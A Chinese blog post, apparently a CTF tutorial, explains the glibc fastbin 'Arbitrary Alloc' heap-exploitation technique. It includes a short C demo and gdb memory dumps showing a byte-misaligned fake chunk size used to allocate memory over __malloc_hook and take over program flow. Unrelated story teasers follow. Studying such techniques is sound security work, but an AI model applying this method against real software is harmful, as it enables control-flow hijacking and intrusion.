再谈堆利用fastbin attack—Arbitrary Alloc

fastbin分为使用的、未使用的。未使用的包含fd,指向下一个fastbin。使用(或分配)的fastbin没有fd,只有prev_size、size、data。

|prev_size|  size   |

|---------|---------|

|   fd    |            |

|---------|---------|

|       data        |

+---------|---------+

typedefstruct _chunk

{

    long long pre_size;

    long long size;

    long long fd;

    long long bk;

}CHUNK,*PCHUNK;

       单链表存储fastbins。释放fastbins时,将其放入表头。分配时,先从表头取。即按照后进先出的原则进行分配。

       见下面的例子

int main(void)

{

    void*chunk1,*chunk2,*chunk3;

   chunk1=malloc(0x10);

   chunk2=malloc(0x10);

   free(chunk1);

   free(chunk2);

   free(chunk1);

    return0;

}


       调用malloc(0x10)三次,将依次分配chunk1, chunk2, chunk1。

       fastbin attack 是一类漏洞的利用方法,是指所有基于 fastbin 机制的漏洞利用方法。这类利用的前提是:

存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞; 

漏洞发生于 fastbin 类型的 chunk 中; 

如果细分的话,可以做如下的分类:

Fastbin Double Free

House of Spirit

Alloc to Stack

Arbitrary Alloc

其中,前两种主要漏洞侧重于利用 free 函数释放真的 chunk 或伪造的 chunk,然后再次申请 chunk 进行攻击,后两种侧重于故意修改 fd 指针,直接利用 malloc 申请指定位置 chunk 进行攻击。

    Arbitrary Alloc在 CTF 中用地更加频繁。我们可以利用字节错位等方法来绕过 size 域的检验,实现任意地址分配 chunk,最后的效果也就相当于任意地址写任意值。下面对它进行详细讲述。

介绍

       Arbitrary Alloc 其实与 Alloc to stack 是完全相同的,唯一的区别是分配的目标不再是栈中。 事实上只要满足目标地址存在合法的 size 域(这个 size 域是构造的,还是自然存在的都无妨),我们可以把 chunk 分配到任意的可写内存中,比如 bss、heap、data、stack 等等。

演示

       在这个例子,我们使用字节错位来实现直接分配 fastbin 到_malloc_hook 的位置,相当于覆盖_malloc_hook 来控制程序流程。

int main(void)

{

    void *chunk1;

    void *chunk_a;

    chunk1=malloc(0x60);

    free(chunk1);

    *(long long*)chunk1=0x7ffff7dd1af5-0x8;

    malloc(0x60);

    chunk_a=malloc(0x60);

    return 0;

}

这里的 0x7ffff7dd1af5 是我根据本机的情况得出的值,这个值是怎么获得的呢?首先我们要观察欲写入地址附近是否存在可以字节错位的情况。

0x7ffff7dd1a88 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1a90 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1a98 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1aa0 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1aa8 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1ab0 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1ab8 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1ac0 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1ac8 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1ad0 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1ad8 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1ae0 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1ae8 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1af0 0x60 0x2 0xdd 0xf7 0xff 0x7f 0x0 0x0

0x7ffff7dd1af8 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1b00 0x20 0x2e 0xa9 0xf7 0xff 0x7f 0x0 0x0

0x7ffff7dd1b08 0x0  0x2a 0xa90xf7 0xff 0x7f 0x0 0x0

0x7ffff7dd1b10 <__malloc_hook>: 0x30    0x28   0xa9    0xf7    0xff   0x7f    0x0 0x0

       0x7ffff7dd1b10 是我们想要控制的 __malloc_hook 的地址,于是我们向上寻找是否可以错位出一个合法的 size 域。因为这个程序是 64 位的,因此 fastbin 的范围为 32 字节到 128 字节 (0x20-0x80),如下:

       通过观察发现 0x7ffff7dd1af5 处可以现实错位构造出一个0x000000000000007f

0x7ffff7dd1af0 0x60 0x2 0xdd 0xf7 0xff 0x7f 0x0 0x0

0x7ffff7dd1af8 0x0  0x0 0x0 0x00x0 0x0 0x0 0x0

0x7ffff7dd1af5 <_IO_wide_data_0+309>:   0x000000000000007f

因为 0x7f 在计算 fastbin index 时,是属于 index 5 的,即 chunk 大小为 0x70 的,将其加入链表。 最后经过两次分配可以观察到 chunk 被分配到0x7ffff7dd1afd,因此我们就可以直接控制 __malloc_hook 的内容。

0x4005a8         call   0x400450

 →   0x4005ad         mov   QWORD PTR [rbp-0x8], rax

 $rax   : 0x7ffff7dd1afd

0x7ffff7dd1aed <_IO_wide_data_0+301>:   0xfff7dd0260000000  0x000000000000007f

0x7ffff7dd1afd: 0xfff7a92e20000000 0xfff7a92a0000007f

0x7ffff7dd1b0d <__realloc_hook+5>:  0x000000000000007f  0x0000000000000000

0x7ffff7dd1b1d: 0x0000000000000000 0x0000000000000000

总结

       fd只要其size域属于该chunk就可以通过malloc检查。因此只要想写入的地址附近有属于该fastbin的size就可以让malloc分配到该位置。

       如此选择一个合适的地址设为A,则chunk起始地址为A-8(pre size),usrdata(fd指针与之同体)部分为A+8,且上一个fd指向地址为A-8。

构造的xx大小-0x10,为malloc的参数,即返回的usrdata大小。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,236评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,867评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,715评论 0 340
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,899评论 1 278
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,895评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,733评论 1 283
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,085评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,722评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,025评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,696评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,816评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,447评论 4 322
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,057评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,009评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,254评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,204评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,561评论 2 343

推荐阅读更多精彩内容

  • 2017年10月21日,再次感受钩编的美!有了专业老师的指导,学起来真是兴趣满满!
    诚信大姐阅读 217评论 0 0
  • 今天算是个里程碑了 第一题 股票的最大利润使用贪心策略,假设第 i 轮进行卖出操作,买入操作价格应该是 i 之前并...
    hayes0420阅读 122评论 0 0
  • 今天我的同事遇到一个需求,需要在上滑的时候显示导航栏,下滑的时候隐藏导航栏。 监听上滑与下滑这个动作,怎么实现? ...
    幸福晓杰2016阅读 834评论 0 1
  • 没有练过格斗,但平时喜欢看格斗比赛,拳击散打还有UFC都有所涉及。对中国的传统功夫也有关注,网上搜罗过咏春的十二散...
    李一十八阅读 419评论 1 0
  • 1.XCode 7.0或更高版本 去官网下载即可 2.Node 安装homebrew 安装 node 安装npm ...
    小布走慢点阅读 130评论 3 1